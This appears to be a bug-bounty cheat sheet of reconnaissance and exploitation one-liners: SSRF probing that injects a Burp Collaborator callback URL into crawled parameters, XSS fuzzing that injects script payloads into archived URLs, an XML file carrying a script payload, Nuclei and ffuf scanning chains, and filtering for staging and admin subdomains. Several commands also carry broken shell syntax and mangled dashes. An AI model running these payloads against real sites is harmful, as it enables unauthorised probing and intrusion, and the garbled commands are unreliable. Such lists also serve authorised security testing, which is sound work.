• Please show us your support by following on:
  1. **https://www.instagram.com/bug_xs/**
  2. **https://www.youtube.com/c/BUGXS/videos**
  3. **https://www.linkedin.com/in/bugxs/**

— Replace HOST to your Target Top-Level-Domain

1. SSRF Automation

python3 [paramspider.py](<http://paramspider.py/>) -d HOST --placeholder '[<http://jf2lko48ltlfmgmngl2cnyay5pbfz4.burpcollaborator.net>](<http://jf2lko48ltlfmgmngl2cnyay5pbfz4.burpcollaborator.net/>)'| while read host do ; do curl --silent --path-as-is --insecure "$host";done

1. XSS Automation

python3 [paramspider.py](<http://paramspider.py/>) -d HOST --subs false --placeholder '"/><script>confirm(1)</script>' > ourpass.txt | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \\033[0;31mVulnerable\\n" || echo "$host \\033[0;32mNot Vulnerable\\n";done

1. XSS Automation

waybackurls HOST | tee HOST.txt | qsreplace '"><script>confirm(1)</script>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \\033[0;31mVulnerable\\n" || echo "$host \\033[0;32mNot Vulnerable\\n";done

1. Katana to Nuclei

cat subdomains.txt | httpx ––silent >> alive.txt && cat alive.txt | katana ––silent >> endpoints.txt && cat endpoints.txt | nuclei -t <YOUR_TEMPLATES>

1. XML to XSS

xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html="[<http://w3.org/1999/xhtml>](<https://t.co/BNaX0bPa4L>)"> <html:script>prompt(document.domain);</html:script> </html>

1. FFUF to find valid sensitive files (Check github repor mention for wordlist)

ffuf -u HOST -w WORDLIST -recursion -mc 200

1. Finding juicy Subdomains

subfinder -d HOST -all | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz\\|api\\|staging\\|env\\|v1\\|stag\\|prod\\|dev\\|stg\\|test\\|demo\\|pre\\|admin\\|beta\\|vpn\\|cdn\\|coll\\|sandbox\\|qa\\|intra\\|extra\\|s3\\|external\\|back'

1. Recon